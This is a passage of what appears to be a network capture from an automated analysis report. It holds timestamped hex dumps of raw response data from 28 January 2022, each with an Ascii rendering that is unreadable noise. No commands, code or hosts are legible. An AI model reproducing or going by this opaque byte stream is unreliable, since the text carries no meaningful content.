2a 40 e3 cb 98 09 92 0e 01 44 76 5d a0 26 dc 0c eb aa 12 f4 3b 12 91 2d f0 34 ca c2 a6 e6 43 60 b5 e0 06 80 7f 34 51 bd 31 14 8c 3b e2 b2 31 bb 68 80 cd 3b 0e 9c e7 57 71 9a 92 32 b5 7e
                                                                                              Data Ascii: 7[)_Z87r'p<utp[&MAP)*D{pu~qmm$Fu~uIk1fGE\_;_8](#8sE[#LbWFl%(4j3@PA<V\*@Dv]&;-4C`4Q1;1h;Wq2~
                                                                                              2022-01-28 18:02:56 UTC1164INData Raw: d9 9e e9 72 5e cb f2 84 23 d1 79 2b a2 03 68 f8 4b da 03 e8 cb 0c f8 d2 1c e6 4b ae 3b 95 96 4f 20 2e 82 35 77 65 3d e7 35 03 be a2 bb 99 b9 25 a5 1c 2f 19 8d 54 5c eb ce ec ba 36 ec 46 f9 d9 97 63 d1 e0 62 be d0 55 6c e5 a9 1c 3f 24 3a e3 7b 9a 65 9c 6a 6b 8b a7 03 ed 5a d7 27 67 dd ca fd 4b 22 67 37 b5 41 ff 08 9c 02 68 3f e9 bf c2 24 33 5c 1f fb 3d 2c d8 b7 24 20 cd d7 7e ea da f5 89 b1 e9 d3 10 99 9f f4 c4 ec eb b8 21 12 6e fa ac cc 41 c9 01 3a ff c4 da fc 85 59 ca 8a da 28 a8 85 35 4f 0d 72 8e e2 49 93 31 dc 04 ca 54 c3 9c 0a d5 22 ae 77 f8 31 78 c5 3c 16 e9 bb a9 fe 45 e2 b8 05 6f 69 32 8d 01 0e 95 24 39 7f 1f a2 7a 97 46 85 b0 8f 72 09 53 62 ca 3c 28 23 26 c7 08 1e c5 23 1a 08 21 e2 c0 b5 9b e2 4b 4f 7b f2 27 e0 cc b6 fe f1 b6 78 ff 0f 76 83 fa a8
                                                                                              Data Ascii: r^#y+hKK;O .5we=5%/T\6FcbUl?$:{ejkZ'gK"g7Ah?$3\=,$ ~!nA:Y(5OrI1T"w1x<Eoi2$9zFrSb<(#&#!KO{'xv
                                                                                              2022-01-28 18:02:56 UTC1168INData Raw: 49 95 fe ad 3f ed af 82 d7 0d 5d ce b6 bc 2e f0 47 80 3e 70 0d e8 90 17 87 54 31 98 94 5b 65 0d 8a 25 95 7a 49 ae 63 9c 82 00 60 89 6d 96 a4 52 dd 33 81 19 7b 76 cd 13 25 e5 4a 32 b6 5a b7 9a 0b 8e bf ba e2 4b 48 8a 52 c3 c5 fc ed 9e 65 c4 bb f3 dd 05 da 08 f1 e7 da fa dc 73 79 e3 72 34 97 64 80 c1 3b 23 89 7f 4c 14 56 31 8f d0 0b 9e eb 72 10 fc e1 20 5e 3b 36 47 1f 3e 83 cb 31 0a f4 26 5e 49 a6 88 b8 71 7b 87 50 cf 57 08 a1 aa 09 8e 4f 3e 9a 84 ac 3d e4 cb 76 8c fc 0b 1b 4c db e3 f2 c0 9c ea 1e e9 32 36 60 4b 42 d6 66 83 22 9e 7e d9 46 89 26 92 34 f2 5b 4f bd fa 58 bb 11 09 9f 91 54 b0 7a 14 77 95 f7 43 a3 97 68 1e 75 1f 44 92 f2 a1 ed 73 31 bf 40 10 be aa 05 98 70 7c 08 62 52 0c 9c 60 a7 1f ab 76 46 ba e4 48 10 7b 94 d6 44 55 3e f5 60 c0 4e 5f 3c d2 6c
                                                                                              Data Ascii: I?].G>pT1[e%zIc`mR3{v%J2ZKHResyr4d;#LV1r ^;6G>1&^Iq{PWO>=vL26`KBf"~F&4[OXTzwChuDs1@p|bR`vFH{DU>`N_<l
                                                                                              2022-01-28 18:02:56 UTC1172INData Raw: 0b d8 17 4a 7d 00 3e 7e 43 6e 36 4b 9d 5b ff e9 0f 85 32 d1 a1 a1 93 bf 2a d4 47 07 d2 89 62 d4 64 df 82 a3 e7 a9 af 3a a6 85 4a 0b 7b 87 27 6e e3 b8 9f 0a f4 36 7c 46 87 27 cd 65 5a 4f 88 3a 6f 5f 4c 90 6c 19 fb d7 ee 1f f9 40 34 33 c3 10 be c3 d5 d3 6e 28 ef 53 01 5d dd 22 64 7a 55 eb f1 48 e8 c4 3b 0b ec 6c 13 fc 98 35 60 58 5e 54 f7 2e ac 76 80 40 00 6c e7 36 56 70 e5 95 7d 76 54 e2 c8 63 09 ba a1 60 7d 3b 53 83 a5 12 b5 46 d0 32 5a 11 c8 35 9c ea 83 b1 f8 4b 55 c4 fe 40 7a db 41 fb 61 3c ed 1f af 9f 8b 0e eb c8 68 07 00 b8 4e 01 5b 85 aa 0a e2 96 fb 58 ab 1f 1c 4f 48 5f 42 5f 14 e8 40 06 53 2d cf 9b 9b a6 50 df 6c 22 7c fb 6e a4 11 32 40 07 15 55 39 91 78 f1 9a 39 04 5e 99 2a 5d d1 d7 37 52 09 7e 0e 51 4c bf 8e 48 49 21 54 97 72 c5 5d 9a 0a 26 58 27
                                                                                              Data Ascii: J}>~Cn6K[2*Gbd:J{'n6|F'eZO:o_Ll@43n(S]"dzUH;l5`X^T.v@l6Vp}vTc`};SF2Z5KU@zAa<hN[XOH_B_@S-Pl"|n2@U9x9^*]7R~QLHI!Tr]&X'
                                                                                              2022-01-28 18:02:56 UTC1176INData Raw: 7f b1 27 e0 24 59 1d fb 80 d6 e8 b7 6b 8a 0e 97 8d 82 91 59 bd 46 be 58 99 f9 cd 82 e1 32 ae 17 c1 ae 19 55 24 bc e5 68 5c 68 5e 98 af a2 81 22 c3 5e 24 b5 ee 25 21 0a fb 12 16 44 68 b1 7d f9 4f 9b ed 59 44 d3 73 df fa 0e 23 81 3a 0a f9 78 12 ce f8 e7 1f 18 dc 31 14 51 a4 8c 16 ee a7 e5 cd 9a e4 33 2a bd 05 3b 9b bc e1 6d 86 46 5f 2f 30 a1 96 d8 9f 06 93 67 81 a1 42 9c 71 a2 82 bf 14 86 c6 c3 af 84 9e 6d fd 4e b0 47 93 75 de cc d5 e5 1b a9 fb 5d 23 73 9c 3a 61 c6 73 d1 d9 7e 83 0c 59 1d 7c 41 82 2e 01 b4 2f de e2 0d 66 da f2 de 4b f5 ac 6d 31 7c ba e4 09 f1 a7 50 47 99 bc 3e cc eb 70 84 99 82 f1 d3 f8 a4 4d 7f 14 ba 02 f7 8b 03 06 45 1e a7 b1 27 d6 1d fd 72 5f 3b 9d 7d b9 37 1c 0a 64 00 ca 9e 7c 5e 95 ee d9 0f d6 88 8e 45 c3 65 b4 0d 5d 89 a7 85 1f f0 ea
                                                                                              Data Ascii: '$YkYFX2U$h\h^"^$%!Dh}OYDs#:x1Q3*;mF_/0gBqmNGu]#s:as~Y|A./fKm1|PG>pME'r_;}7d|^Ee]
                                                                                              2022-01-28 18:02:56 UTC1181INData Raw: 8a 91 fe 16 b9 00 d0 4d 68 b6 6f 2f 7b 91 ec 27 fc 0b a9 0c 8c 1a bf 44 cf 66 e3 ab 23 73 18 12 85 81 cf 3b 9b a8 54 69 af f0 0a 76 91 c4 46 43 b7 fd fd fb 20 ff d5 14 82 37 fe 2d dc 57 35 75 b0 f5 8c 21 49 dc d8 67 5d dc d5 0d 16 72 fe 26 9a 64 17 8e 94 c8 1f 0c 68 d6 e4 62 0f 52 02 ad d8 98 19 9f 65 de 76 6a 88 3d 50 71 39 fe fc 68 f2 18 bd df 89 a9 b9 36 ca e2 ee bc b3 ca 27 28 a5 bd 5e 8e 63 7c 55 cd ee 80 d5 79 c4 18 fc 5b 4c b1 e7 a9 2c ed 06 2b ce a4 7a 27 f4 9e e4 ce 08 0f 04 b5 26 23 f3 15 ee f5 ce 9c 6e 53 e5 05 6b b7 69 94 f6 f2 5a ce 9e 9b e7 cf 65 8b 76 4f 55 d8 82 86 9b ba 66 9b de cf 41 65 5c 9e 14 1a 8c 5e aa c4 82 de b2 76 b2 9f a6 1f 94 03 0d a5 b4 f2 86 32 52 9c 1f dd c0 3c 79 2c 28 2b a3 ad a4 a3 06 cf 1a 9e 72 98 33 83 cf 31 6d c6 1c
                                                                                              Data Ascii: Mho/{'Df#s;TivFC 7-W5u!Ig]r&dhbRevj=Pq9h6'(^c|Uy[L,+z'&#nSkiZevOUfAe\^v2R<y,(+r31m
                                                                                              2022-01-28 18:02:56 UTC1185INData Raw: 3c 2e 1f 1a 45 90 4f b5 01 18 6c 57 cf a3 e5 19 50 7c af 50 e1 32 51 98 49 5f 74 a8 df e2 84 3d d3 7d 7f 31 68 b4 34 d5 1a c0 23 db 3d e6 05 c4 26 8b cb 41 fe 69 d3 ce c8 7e 1d 23 c6 bc dc 4d c8 d0 3a 5d 9b b3 e7 54 e8 5e 87 6d 0d dd ff 32 15 9f e2 df 0b 1b 9b 7a da 88 37 c5 cb fe c6 fb a0 fc b4 49 d5 d2 c3 f7 75 45 3a ae c2 d3 58 8d b2 09 dc 6d 20 dc 27 7e ca e3 f4 2b d6 a5 46 43 7f ec 26 a3 9a e2 31 02 64 c1 3c 33 00 c0 8e 58 98 96 9c 77 87 8a 9e 11 5e 6c 64 17 0a e4 b2 ff 26 55 0c 26 ed 99 67 3d b0 5b c6 c1 13 71 60 51 21 0d 53 7d 7d c3 65 e5 f5 74 16 9e 25 28 97 01 28 28 6d ca c5 04 83 60 c4 67 e0 5f a5 b8 e8 aa 53 d5 52 ab 78 89 6f ad 26 53 95 6c 20 3d fd c8 5e f3 62 42 63 09 0c 32 fe b0 70 27 ee bd eb 19 f6 bc 45 9b 25 b3 f4 6e f4 16 2c 4f b8 2b 1e
                                                                                              Data Ascii: <.EOlWP|P2QI_t=}1h4#=&Ai~#M:]T^m2z7IuE:Xm '~+FC&1d<3Xw^ld&U&g=[q`Q!S}}et%(((m`g_SRxo&Sl =^bBc2p'E%n,O+
                                                                                              2022-01-28 18:02:56 UTC1189INData Raw: 0a 43 b0 2c 0e da ee 7b ba 8e 72 f8 03 2e 60 24 77 a9 87 7c 67 a5 eb 26 1c 76 7c 3d 1b 52 5c ab 7b 35 f2 42 e2 95 9a 32 96 91 1b 28 db 72 7b 06 76 bc 18 bb 06 bc 0c 05 6c 8a 77 1c 48 26 d8 67 d5 1d 10 2f 34 9e a0 dd 91 50 c6 9a f4 fd a9 a8 a2 9d 60 57 51 e8 bc 23 55 a8 c1 cb fd b0 f5 a6 df 3d 02 1d c1 c7 1d 43 e7 c0 de 3c f3 be fd 36 8c e0 6a e0 73 a3 37 95 d3 20 3f 2d 5d e2 d0 e3 c4 26 0c 62 0b 86 30 17 f5 e2 5a df 24 85 35 5c 09 d8 a9 5b a6 29 8c 36 c1 de f9 8d 85 77 e3 b7 c2 db 83 af 35 da e5 34 b2 2b e8 d8 9c 59 f4 20 db 21 7f b6 5d b1 96 bc 9d 63 58 0f ca 28 3b 96 e5 34 1a 2b 32 f7 15 0e 31 60 2f a0 88 bc b3 4b a1 40 84 dc 1b 6b 34 71 f3 03 73 f3 33 71 19 f2 ec 01 ef 28 29 22 c1 69 64 d4 2d d5 73 68 d2 a2 8f 78 02 4a 12 eb 51 bd da 84 56 57 52 55 21
                                                                                              Data Ascii: C,{r.`$w|g&v|=R\{5B2(r{vlwH&g/4P`WQ#U=C<6js7 ?-]&b0Z$5\[)6w54+Y !]cX(;4+21`/K@k4qs3q()"id-shxJQVWRU!
                                                                                              2022-01-28 18:02:56 UTC1193INData Raw: 6e 5d 56 3a f2 d9 56 08 f4 f9 49 cf 89 cd 54 35 09 9e 4d 00 5a 18 45 56 f4 cf 85 56 42 c5 bb 69 64 12 34 2d 5b 35 fe ee d0 9f bc fb 18 71 f6 00 97 c9 cc e9 57 7d 42 17 8b 5b 1b 14 b4 84 02 e6 6d 52 7d c7 9f b8 31 22 f4 a4 57 e1 cc d5 44 fe 12 f5 57 bb 30 e5 33 66 fe 8b f4 de 3d 71 90 2e d6 9a 31 93 9c 9e 9d b6 3d 6d 3e 02 d0 6f 62 ab dd f0 46 91 ad d9 7b 87 16 92 65 15 7b e4 c5 d7 88 7d ea e9 0d e6 a9 22 46 59 08 11 56 b6 5a b9 3b 97 18 ae 62 66 6c 1a 23 bd 3c 2c 63 9a 3e fd 02 6d 8d 0f d6 d7 cc 73 c1 ac b6 7a d5 fd cf 63 4d 4b 00 69 15 f8 6c 6b 71 59 45 72 c4 12 12 63 b6 94 93 1c 21 a9 fd bc 62 da 80 14 66 00 cf 9e 83 8d 8c c2 f6 3f 6a b2 dc 70 81 5f e4 66 b5 25 fc 06 75 f4 78 e4 0b 73 14 7f ae 3a 5b cf a2 ec b8 3f 10 aa ca f6 84 32 6b 3f 96 06 6b f3 3b
                                                                                              Data Ascii: n]V:VIT5MZEVVBid4-[5qW}B[mR}1"WDW03f=q.1=m>obF{e{}"FYVZ;bfl#<,c>mszcMKilkqYErc!bf?jp_f%uxs:[?2k?k;
                                                                                              2022-01-28 18:02:56 UTC1196INData Raw: 7d 31 fe 35 fc 6a c8 0e 8f c3 6b cb a9 b4 56 44 be 87 b6 14 51 40 ed 40 ce 0e d7 c7 d4 5f 30 2b 61 e6 2b e8 e8 bd a2 99 d1 50 88 50 6c e0 bb 45 2a e3 2e 32 e4 d6 97 19 10 a4 e3 7a 7d 33 cb 28 d2 31 96 4a ea d6 f3 8f 81 57 a2 0c d8 fe 1e 35 e7 c7 d5 27 b9 70 f1 6d 09 f4 70 15 08 73 55 0a 3d 9e 13 15 11 ac cd b9 33 fa 0d d2 aa d4 ab 0c fb 27 b1 df ec de 71 13 bd f0 8a c7 8d 15 76 83 f8 6d 04 c9 79 3e 5c 30 09 60 fd b7 68 c9 2c 28 14 d8 75 25 18 1c 32 79 a8 6a a9 07 d1 18 fc 89 a3 37 f0 46 6c c3 18 8b 53 b8 c8 29 66 36 d6 52 fb 39 2f 9a cb 3a 63 9a ea 5e 8b cc 8e f9 0b 33 b8 2e b3 8d 92 3b d3 50 86 fc 5d 66 3c 5d 99 e7 14 d7 2a 95 0a de 2b f2 ab 03 d9 ff fd 7b 2f f6 5c d1 e1 94 a2 cd 1e 24 69 c7 04 e5 1a 07 57 c7 83 1b da c4 05 3b 07 7e 83 40 43 98 d4 a1 ae
                                                                                              Data Ascii: }15jkVDQ@@_0+a+PPlE*.2z}3(1JW5'pmpsU=3'qvmy>\0`h,(u%2yj7FlS)f6R9/:c^3.;P]f<]*+{/\$iW;~@C
                                                                                              2022-01-28 18:02:56 UTC1200INData Raw: 82 25 80 e4 b2 58 ff 59 4a b5 85 da ba 4e 5d f4 6c 7f 83 cc ff 66 b6 ad 8d 02 9f 56 1f dd ec 57 19 96 54 c9 f4 58 99 71 90 3a 79 b0 9f 78 56 e5 28 ec 4e 3f 95 a0 2b a5 95 1b 95 0f fb 6a 39 8b d2 1b 6f ab 64 83 c5 a2 a4 5f 00 50 72 ec e2 18 1c 1e d7 d1 5c 2b 33 e6 74 46 48 27 c9 e0 1d 16 bd b1 5b 96 d5 2b 53 63 3e 59 3c b4 20 79 7e 27 99 fa b1 56 20 f8 7e 85 48 14 76 fa fe 2e 80 37 bb ae 33 18 69 9e 60 9f 29 5a 1d 0a 8d d0 9f 1d 2b 04 cc 5f 69 1e eb 8c bb d7 bd 6a cf db 86 e7 a3 a6 e3 23 b1 06 dc 27 c6 d6 43 ed 51 98 64 62 d5 94 d4 a1 86 84 ae bc 70 6a 79 3b ce a5 1b 64 c9 d0 9b aa 2b 2b 11 f7 78 06 8b ff 3b 21 03 33 0b e8 1a b3 e9 bc d7 0d c7 c2 1a 9b 94 da e7 d4 98 78 9d a9 8c 37 56 ed 51 80 8e 7e 6b 7c cf 7d f7 f5 ec 1b fa be 96 c2 0f a1 86 3d 50 f3 ba
                                                                                              Data Ascii: %XYJN]lfVWTXq:yxV(N?+j9od_Pr\+3tFH'[+Sc>Y< y~'V ~Hv.73i`)Z+_ij#'CQdbpjy;d++x;!3x7VQ~k|}=P
                                                                                              2022-01-28 18:02:56 UTC1204INData Raw: 65 4f eb a3 43 4e 1b d8 b6 21 20 dd 80 67 db 5d f9 f2 88 75 b5 ae 41 a8 63 ba 8c 0a 1f 44 68 0a 50 b1 d9 d8 05 14 b1 67 60 b0 10 2b e4 aa 16 8c 38 28 cc 69 09 bc e5 4a e3 d3 f3 52 94 c9 a2 f8 7e 01 b3 61 78 fd f5 89 70 71 9e 67 dc 95 cf 2b 7d 35 23 9a d4 28 5a 62 98 97 90 89 a8 f1 a0 dd 62 5f 46 8a 03 6c a6 ee 81 00 b7 91 ab e4 fe 0c a0 8c 57 27 ef 03 5f 54 37 a9 01 57 fd 21 8f 8e 6e 6f 27 31 51 45 7e 87 88 f1 2d 31 43 c2 d7 c6 aa f2 ae 48 db 78 fb 4b 47 1c 1e f2 66 19 9f 9b 9b 72 24 9b 6b 21 43 8c 90 f2 3e 59 cd 03 5d ac 01 01 b9 40 23 8d 67 52 f4 48 5e fa f7 9a 2e 14 ae c5 5a 00 79 51 d9 bd 2a 4b 6d 20 70 1e 24 ac da 8c 66 f6 29 61 09 3e 64 66 c1 cf 93 6d b4 5e 43 f2 e2 bb 7e 98 12 70 42 d7 ec 8f 2e 97 4d 3d d2 e0 61 11 86 d1 9b ba eb b2 82 7b 65 54 d2
                                                                                              Data Ascii: eOCN! g]uAcDhPg`+8(iJR~axpqg+}5#(Zbb_FlW'_T7W!no'1QE~-1CHxKGfr$k!C>Y]@#gRH^.ZyQ*Km p$f)a>dfm^C~pB.M=a{eT
                                                                                              2022-01-28 18:02:56 UTC1208INData Raw: fa 55 04 e0 1b d5 2f ce 1c d0 a3 fb be ae 03 dd 4a 70 59 88 73 38 d7 9a 5f b6 0b 75 f4 40 f9 c0 68 b1 19 70 a5 31 8e 45 80 28 f8 5a 0e e4 01 33 19 20 47 3f 3f 0a c3 bc 3a b7 3c 58 58 df 9f ae b7 71 e8 32 b6 9f 32 a6 04 49 5a 3b 82 b7 98 99 bb 22 b7 7a a8 0e 25 78 b0 d1 7a b6 b8 b0 dc fa 9a bd 29 f5 e2 08 df 20 29 df b8 7b 8e 7e 4c 99 63 17 c5 f7 13 03 66 70 bd bb 19 0c 2f a4 fb f3 fa 9d e4 14 4a f2 d2 d6 0a 46 4b 1c e0 9c d9 6e 76 db d4 37 9e e6 27 ec ba c7 7a 5e d9 b4 58 0c 6a 33 80 7d bf be 58 ad 8e f3 15 42 57 8a 69 90 73 8c 3b 27 0e 92 52 bf 9c f6 2e e4 07 6a 8f 1d e2 64 39 62 7c 76 96 30 34 f8 56 de 3c 6e 9b a1 1c fa d3 3e 03 09 35 2b f7 74 d3 9e 91 8d 8f 27 a7 6b 83 f7 3c ac 68 be e5 a7 9f d0 03 5f ba 09 d1 1d c8 d0 09 81 0e 90 dc 57 65 bc 84 19 48
                                                                                              Data Ascii: U/JpYs8_u@hp1E(Z3 G??:<XXq22IZ;"z%xz) ){~Lcfp/JFKnv7'z^Xj3}XBWis;'R.jd9b|v04V<n>5+t'k<h_WeH
                                                                                              2022-01-28 18:02:56 UTC1213INData Raw: be e4 5c 79 c8 44 c0 67 30 fa 13 ff 56 3f 7a 11 2c 69 e8 f1 b7 f1 91 5d ed 4a 2d 76 e0 5d cf 87 cf 79 d6 3a 2b bd 59 bc fe 40 da f6 ac f4 9d 6f c4 91 da dc 1e 52 50 cb a9 ac ec 5d 88 98 2e 4d d5 e3 ec b8 14 f5 dc d2 92 df 11 d0 3a 4a a8 9f 43 c7 19 97 d0 b4 a7 fa 50 c9 2b 8a 72 9b 88 07 bb b2 3d 9d 01 00 bc 80 87 da 0a de 05 a5 21 66 02 c1 79 83 95 03 cf 75 6f 03 10 b2 cf e8 a8 c6 78 fa 85 9f bf 53 e5 ed c3 ec 16 6c ca 22 26 49 5f b9 39 82 db 40 5f 69 14 d3 d5 d1 08 a5 3c e7 78 da 0d 9f ab a2 87 c5 09 82 88 6a 53 f2 26 92 24 5f 86 5b 01 1e f9 39 ee f5 45 28 22 87 4f 1c b3 5b ef 74 a7 69 3e f5 12 b5 8f bc 19 eb 0f 82 a9 be c9 1d bd d7 cc 77 43 7f fe 8b a8 ee 0c bb 21 eb 62 15 fa 95 22 60 c8 86 88 c2 d0 f6 95 fa 4a 30 b0 2e 58 79 bd e6 35 76 73 22 ee d8 72
                                                                                              Data Ascii: \yDg0V?z,i]J-v]y:+Y@oRP].M:JCP+r=!fyuoxSl"&I_9@_i<xjS&$_[9E("O[ti>wC!b"`J0.Xy5vs"r
                                                                                              2022-01-28 18:02:56 UTC1217INData Raw: 87 45 4e 67 37 76 3d 83 7c 70 76 20 ee f6 c5 c4 27 15 d9 92 c2 02 2d 73 cb e2 3f b7 08 0b 0f 87 ca 85 bc ee 15 4f 41 b2 05 5e e7 4a c8 e9 52 12 0b b2 92 eb 45 8d 42 de 94 d6 2a d2 f1 d1 d2 18 ef cf e9 b2 22 31 16 3c 16 90 a4 36 02 98 b4 8a 00 e8 8b e0 38 4d 30 5d 28 7e bb c3 52 ce b9 cf b6 a4 90 50 7d 47 33 14 d8 e1 73 2e 42 82 14 95 82 5d 7e ec 5d d8 f8 28 07 98 9b f2 92 2b ab b8 4e a9 63 3a 15 94 33 2b 98 15 a0 c0 16 f6 72 6f 92 3c 6c 38 7b 64 7f ac 65 9a 16 96 be 2a 3a 9d 10 19 53 39 3b d9 01 c8 ed 38 b1 fd 8e 80 29 7f 18 9a b4 a3 52 7e 7f 3a cc 7d 88 f8 ba c3 4f da f5 32 ae 4a 44 d6 59 0f 1f 79 7a 55 ff 15 72 57 f5 91 cd bf cd 73 08 02 e4 fc ee a5 9e 7d 5b ce 96 3f bb 8a c7 cf 6c 06 ce cf 6c ae be 5b 70 c2 de 86 59 9f 11 56 5b e6 dd dc 98 44 e8 93 63
                                                                                              Data Ascii: ENg7v=|pv '-s?OA^JREB*"1<68M0](~RP}G3s.B]~](+Nc:3+ro<l8{de*:S9;8)R~:}O2JDYyzUrWs}[?ll[pYV[Dc
                                                                                              2022-01-28 18:02:56 UTC1221INData Raw: d0 a3 51 8a 7f cc 69 b9 fe 9c 3e 68 ba d2 a2 e1 b1 56 d7 a1 3e d9 b1 87 11 47 25 3b f3 3c 0f bf 64 59 e2 bd dc bf f5 f0 66 5c ae f9 ca 55 52 53 09 1f b1 79 90 e4 7a cb 3f eb c7 e8 7c 86 03 12 69 73 e9 bf 33 44 29 ba 97 aa 16 a5 b8 2c f5 b1 f4 2f 38 b8 1d 4c 13 7a 26 80 eb 6f 2c 72 a7 6c d1 d5 d0 34 39 3e 76 82 a8 01 fc 01 e5 95 b7 15 41 1f 53 97 ee 7f a1 2b cf d5 1d 2c 8d d9 4b 77 a5 97 18 79 08 d3 c6 3e 65 9a 73 54 78 c2 a5 34 bc c5 a7 23 74 4a 44 bf fd 27 66 a1 8e 0d f1 0d bd e3 12 98 f5 48 bb 81 3a 06 dc 9e 37 59 1a 89 25 60 0e 56 9a 45 61 1b c9 56 ea d0 2f b5 c8 cd 63 9f 96 db 1a c3 6c af d7 6d 98 f2 64 0b e5 60 cc e2 84 63 ef 81 bf ca 68 5c b9 38 c1 03 cb 03 86 13 95 47 9c df 25 d9 16 4f 03 cc ae b9 bb ab 4e 4a 74 36 ea 80 83 e4 48 e7 3e b5 40 06 ca
                                                                                              Data Ascii: Qi>hV>G%;<dYf\URSyz?|is3D),/8Lz&o,rl49>vAS+,Kwy>esTx4#tJD'fH:7Y%`VEaV/clmd`ch\8G%ONJt6H>@
                                                                                              2022-01-28 18:02:56 UTC1225INData Raw: da c7 34 09 ff 5a 31 3f 3a 59 92 c3 a5 6b c4 ab fc d0 d8 26 32 8e 8b 2a 3f 2b 2c 86 a4 00 60 05 35 e0 26 f7 e7 08 d6 69 7b 1c de 4c f6 0b e0 98 66 4c af 86 e8 74 7f 3a 19 cd 12 78 b4 e9 62 78 bb 02 88 b2 9e e8 f2 f2 dc ff b9 cc b4 5b 4b 25 0c 44 b2 7a 39 cf 45 60 25 ae 35 31 43 1e b9 40 4a 3f 66 ed 28 e1 a4 00 54 fc ec 25 8a 1e a3 49 ca 59 9f 0d ce cc e2 e0 93 96 82 e1 60 0d c4 9b 29 fd 04 ad 67 ac 36 19 1e 3e e3 5a 59 1d 1e d2 32 b2 cc 50 71 96 fd fa af 7f 70 fa 22 b1 16 c2 29 5d b9 c4 d0 65 1a 62 56 90 8f 54 1f 56 d4 34 4a 82 56 5c ad 39 da 93 cd d6 0b 1f ce e7 fa e0 7b dd b9 8f 26 bd 3e 23 92 ee 3d 95 04 fb c9 db a6 07 ee 2d 08 d5 99 76 f9 f3 54 db 95 82 d9 e9 50 17 51 52 fc 36 52 db 96 c3 2c e9 69 9b 77 f7 c7 42 01 30 da fa 5f cd 7f 10 b3 a2 c5 cc 48
                                                                                              Data Ascii: 4Z1?:Yk&2*?+,`5&i{LfLt:xbx[K%Dz9E`%51C@J?f(T%IY`)g6>ZY2Pqp")]ebVTV4JV\9{&>#=-vTPQR6R,iwB0_H
                                                                                              2022-01-28 18:02:56 UTC1228INData Raw: 61 bb 6a 63 d8 b6 49 00 be d4 a2 25 86 7a b9 07 88 99 5a 96 fc 96 59 74 46 8f f7 95 f2 b1 34 71 d9 25 1c b7 ed 92 11 8f b0 e2 8c 33 cc 65 b5 10 12 bb 40 bd 03 37 07 af c5 17 88 ee e4 27 40 a4 2d 60 1b 3e d1 af ca 46 27 03 dc d1 0b 98 d0 0e 39 24 91 41 db 2c ee 0b 1f 1e 59 19 c6 aa ac e9 bd 9c 69 69 20 d1 b8 55 ba 5d 11 3a 29 de 0b ff 62 fe 85 e8 9d ed 33 5e 62 4d 41 48 f3 aa c1 e5 70 4d 6c 64 65 25 9e da ab de ce d1 02 10 8f 21 a2 d9 1d 51 7c cf 7c 8b b9 54 cf 5d 58 81 9c da 00 c6 ad 97 a3 2b 16 09 7e 45 f2 a3 71 bf 9f 6b 74 ea 3f a5 68 00 89 09 84 17 f0 73 7e 72 0b 12 81 ae 04 50 71 e9 7c 7b 05 16 f7 ba 4c 70 9c 05 18 41 c5 96 4a de ab 52 a8 f2 e7 c2 ec 3b 21 fe df a0 0a af 5a 3a 19 53 39 f4 e9 ce e0 a8 9b dd e4 8d 61 58 31 3a 30 c6 30 7c a9 18 13 4e 45
                                                                                              Data Ascii: ajcI%zZYtF4q%3e@7'@-`>F'9$A,Yii U]:)b3^bMAHpMlde%!Q||T]X+~Eqkt?hs~rPq|{LpAJR;!Z:S9aX1:00|NE
                                                                                              2022-01-28 18:02:56 UTC1232INData Raw: c9 32 0f ed ef f2 79 ca b4 f3 99 ca b7 61 07 02 c4 e3 93 a3 ac fa 0e da 26 59 2f 80 7c 4d 78 5b 7e 54 f4 06 d6 37 ad 27 8b 89 83 9f cf 2c 0c ba 8e 7d d6 42 c3 17 ab 2a 0f b6 99 ac d6 42 b7 05 2b 8c 7a 22 76 43 49 55 04 ad 53 0b 4e e2 62 ef f7 e0 20 19 a6 bb 0b 41 3b c0 ff d5 3b c9 2a 79 d1 3d cc dd db c4 91 e4 6c b8 fd dd af 27 f7 eb 84 17 a3 c7 68 d1 49 2b f3 86 7e 2c 0a b1 69 2d 85 8f f7 ec 09 3a 4f 10 3d c3 67 50 e2 66 a7 33 98 59 09 4d 60 99 df a4 b3 63 62 94 67 51 12 42 b7 79 a1 b0 ea 73 c4 92 6b 27 89 89 fd d9 bc 8b f4 0a cd 2d fd dd a9 4a af 54 f9 ee 09 31 e0 50 e9 f9 9b dc 2a 75 ba fc 5d 0e c5 64 9b a3 bf 73 ca ab 24 79 ac ad 27 f4 0a bc 8c 76 41 38 2b fc 50 91 e3 eb 89 82 16 55 03 27 84 1b e6 12 4c d8 35 df a4 ba 87 fd ac a0 36 25 fd d0 b1 18 51
                                                                                              Data Ascii: 2ya&Y/|Mx[~T7',}B*B+z"vCIUSNb A;;*y=l'hI+~,i-:O=gPf3YM`cbgQBysk'-JT1P*u]ds$y'vA8+PU'L56%Q
                                                                                              2022-01-28 18:02:56 UTC1236INData Raw: fb 95 da 63 5a ad 18 39 ee 54 b3 42 85 d4 fc 30 57 15 91 a3 fe 4d 21 a7 09 54 b3 54 b3 02 e1 b9 37 c9 60 a0 77 e2 20 48 94 78 10 64 dc 65 5f 31 d9 ed bd 61 55 42 85 d4 fc 10 05 48 94 37 e9 c6 d8 27 c0 ad 18 7c 1a 72 00 b2 a5 62 d7 c2 ce f6 54 c1 4b 73 83 de 16 66 e2 45 0d 5d 4a fe 68 86 34 04 e6 59 40 a0 77 e0 1b c0 c9 05 68 95 da 78 10 56 b8 a5 03 4a 9a 03 63 7f a2 54 b3 07 6d 07 6d 10 05 06 eb c2 ce 82 2a 25 ba 99 e5 ce ed d2 f7 f6 54 c7 5b 30 57 54 b3 07 6d 0c fa 3b f3 a8 8b af 1d cf 6f 59 40 f4 4f 55 36 0f 82 66 e2 3d f8 70 fb 85 b1 07 6d 5c c8 fd e6 58 be a0 77 e3 a3 8b c1 24 38 09 73 a3 fe 0e ff 84 2f f4 4f 52 ae ee 3f 92 53 11 87 c2 ce 83 ac e0 1b ce ed de 16 34 61 21 b0 d3 7a 7c 1a 52 ae 86 34 48 94 3c 76 2e 52 86 34 41 02 92 53 55 36 08 f0 31 d9
                                                                                              Data Ascii: cZ9TB0WM!TT7`w Hxde_1aUBH7'|rbTKsfE]Jh4Y@whxVJcTmm*%T[0WTm;oY@OU6f=pm\Xw$8s/OR?S4a!z|R4H<v.R4ASU61
